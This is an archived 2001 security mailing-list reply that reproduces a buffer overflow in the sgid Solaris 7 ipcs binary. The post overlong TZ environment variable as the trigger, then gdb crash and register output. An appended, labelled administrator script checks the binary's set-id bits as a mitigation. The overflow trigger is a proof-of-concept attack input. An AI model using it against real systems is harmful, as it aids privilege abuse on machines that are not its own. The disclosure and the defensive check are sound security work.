Re: Solaris ipcs vulnerability

From: ARAI Yuu (y.araiat_private)
Date: Mon Apr 16 2001 - 09:32:03 PDT

    Hi,
    
    I could reproduce the same buffer overflow on SPARC Solaris 7.
    /usr/bin/sparcv7/ipcs is installed as sgid "sys".
    
    ---
    # TZ=`/usr/local/bin/perl -e 'print "A"x1107'`
    # ./ipcs
    Segmentation Fault (core dumped)
    # /usr/local/bin/gdb ./ipcs core
    GNU gdb 4.18
    Copyright 1998 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB.  Type "show warranty" for details.
    This GDB was configured as "sparc-sun-solaris2.7"...
    (no debugging symbols found)...
    Core was generated by `./ipcs'.
    Program terminated with signal 11, Segmentation Fault.
    Reading symbols from /usr/lib/libkvm.so.1...(no debugging symbols found)...
    done.
    Reading symbols from /usr/lib/libelf.so.1...(no debugging symbols found)...
    done.
    Reading symbols from /usr/lib/libc.so.1...(no debugging symbols found)...done.
    Reading symbols from /usr/lib/libdl.so.1...(no debugging symbols found)...done.
    Reading symbols from /usr/platform/SUNW,Ultra-2/lib/libc_psr.so.1...
    (no debugging symbols found)...done.
    #0  0xff2bd830 in nvmatch () from /usr/lib/libc.so.1
    (gdb) bt
    #0  0xff2bd830 in nvmatch () from /usr/lib/libc.so.1
    #1  0xff2bd8dc in getenv () from /usr/lib/libc.so.1
    #2  0xff2f6d8c in dcgettext_u () from /usr/lib/libc.so.1
    #3  0xff2f6cb0 in gettext () from /usr/lib/libc.so.1
    #4  0x112d8 in main ()
    #5  0x10e8c in _start ()
    Cannot access memory at address 0x41414179.
    (gdb) info registers
    g0             0x0      0
    g1             0xff3107b0       -13563984
    g2             0x0      0
    g3             0x0      0
    g4             0x0      0
    g5             0x0      0
    g6             0x0      0
    g7             0x0      0
    o0             0xff321ccc       -13493044
    o1             0xbef9a7 12515751
    o2             0xff331f98       -13426792
    o3             0xff31f296       -13503850
    o4             0xff331f98       -13426792
    o5             0xff2bd8a8       -13903704
    sp             0xffbee758       -4266152
    o7             0xff2bd8d4       -13903660
    l0             0xff3a0148       -12975800
    l1             0x45658  284248
    l2             0xff286940       -14128832
    l3             0xff2f6c80       -13669248
    l4             0x0      0
    l5             0x0      0
    l6             0x0      0
    l7             0x0      0
    i0             0xff321ccc       -13493044
    i1             0x223b4  140212
    i2             0xff331f98       -13426792
    i3             0x0      0
    i4             0xffbef8b4       -4261708
    i5             0xf      15
    fp             0xffbee7b8       -4266056
    i7             0xff2f6d84       -13668988
    y              0x0      0
    psr            0xfe000000       -33554432       icc:----, pil:0, s:0, ps:0, et:0
    , cwp:0
    wim            0x0      0
    tbr            0x0      0
    pc             0xff2bd830       -13903824
    npc            0xff2bd834       -13903820
    fpsr           0x0      0       rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, a
    exc:0, cexc:0
    cpsr           0x0      0
    ---
    
    It seems that the "core" installation of Solaris 7 will not install
    /usr/bin/sparcv7/ipcs.
    
    Regards,
    -----------------------------------------------
    ARAI Yuu <y.araiat_private>
    Security Engineer / LAC Computer Security Laboratory
    http://www.lac.co.jp/security/
    
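An added administrator check, not part of the original post: it reports whether the binary the report names is installed on a host and still carries set-id bits, so exposure can be confirmed and the sgid bit dropped until a patch is applied. It assumes only the path given above by default; any other paths are passed as arguments.

```shell
#!/bin/sh
# Added example (not from the original post): confirm whether the ipcs binary
# from the report is present and still set-id, and print the mitigation.
# Assumption: by default only the path named in the report is checked;
# additional paths may be passed as arguments.

IPCS_PATHS="/usr/bin/sparcv7/ipcs"

# classify_privs PATH: prints missing | sgid | suid | suid+sgid | plain.
# Always returns 0 so it is safe to call under `set -e`.
classify_privs() {
    _p=$1
    if [ ! -e "$_p" ]; then echo missing
    elif [ -u "$_p" ] && [ -g "$_p" ]; then echo suid+sgid
    elif [ -g "$_p" ]; then echo sgid
    elif [ -u "$_p" ]; then echo suid
    else echo plain
    fi
    return 0
}

# check_ipcs [PATH...]: one report line per path. Exit status 2 if any path
# still carries a set-id bit (exposure is live), 0 otherwise.
check_ipcs() {
    [ $# -eq 0 ] && set -- $IPCS_PATHS
    _rc=0
    for _p in "$@"; do
        _v=$(classify_privs "$_p")
        case $_v in
            missing) printf '%s: not installed (a "core" install omits it)\n' "$_p" ;;
            plain)   printf '%s: no set-id bits\n' "$_p" ;;
            *)       printf '%s: %s -> %s\n' "$_p" "$_v" "$(ls -ld "$_p")"
                     printf '  mitigation until patched: chmod u-s,g-s %s\n' "$_p"
                     _rc=2 ;;
        esac
    done
    return $_rc
}

# Run against the default path, or the paths given on the command line.
check_ipcs "$@"
```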
    This archive was generated by hypermail 2b30 : Mon Apr 16 2001 - 12:13:15 PDT